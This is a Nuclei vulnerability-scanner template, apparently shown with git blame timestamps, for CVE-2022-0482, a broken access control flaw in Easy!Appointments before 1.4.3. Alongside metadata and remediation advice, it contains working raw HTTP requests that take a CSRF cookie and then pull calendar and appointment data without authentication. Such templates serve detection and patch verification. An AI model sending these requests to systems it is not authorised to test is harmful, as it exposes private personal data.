2022-04-09 15:49:47 +00:00
id : CVE-2022-0482
info :
2022-05-18 20:58:07 +00:00
name : Easy!Appointments <1.4.3 - Broken Access Control
2022-04-09 15:49:47 +00:00
author : francescocarlucci,opencirt
2022-04-09 15:50:05 +00:00
severity : critical
2022-04-09 15:49:47 +00:00
description : |
2022-05-18 20:58:07 +00:00
Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments.
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade Easy!Appointments to version 1.4.4 or above to fix the Broken Access Control vulnerability.
2022-04-09 15:49:47 +00:00
reference :
- https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/
- https://github.com/alextselegidis/easyappointments
2022-04-11 08:38:32 +00:00
- https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/
2022-05-18 20:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-0482
2023-07-11 19:49:27 +00:00
- https://github.com/alextselegidis/easyappointments/commit/44af526a6fc5e898bc1e0132b2af9eb3a9b2c466
2022-04-09 15:50:05 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 9.1
2022-04-09 15:50:05 +00:00
cve-id : CVE-2022-0482
2023-10-23 07:14:07 +00:00
cwe-id : CWE-359,CWE-863
2023-10-26 18:00:24 +00:00
epss-score : 0.06254
2023-10-30 20:55:37 +00:00
epss-percentile : 0.92791
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:easyappointments:easyappointments:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : easyappointments
product : easyappointments
2023-09-06 11:59:08 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : cve,cve2022,easyappointments,huntr
2022-04-09 15:49:47 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-09 15:49:47 +00:00
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
Accept : */*
- |
POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01
cookie-reuse : true
2023-07-11 19:49:27 +00:00
2022-04-09 15:49:47 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"appointments":'
- '"unavailables":'
2022-04-11 08:38:32 +00:00
condition : and
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
extractors :
- type : kval
name : csrf_token
internal : true
kval :
- "csrfCookie"
part : header
2023-10-31 09:39:52 +00:00
# digest: 4b0a0048304602210082e0bd2d8ffb6b0c9b8245979915ed2ad1eb9bb66a5d3bb7991e2d38ebd78e760221009ee8956f6bb38986a40e5fd6ce91a4997ea57d5419cd4b03a4d05aea0938da14:922c64590222798bb761d5b6d8e72950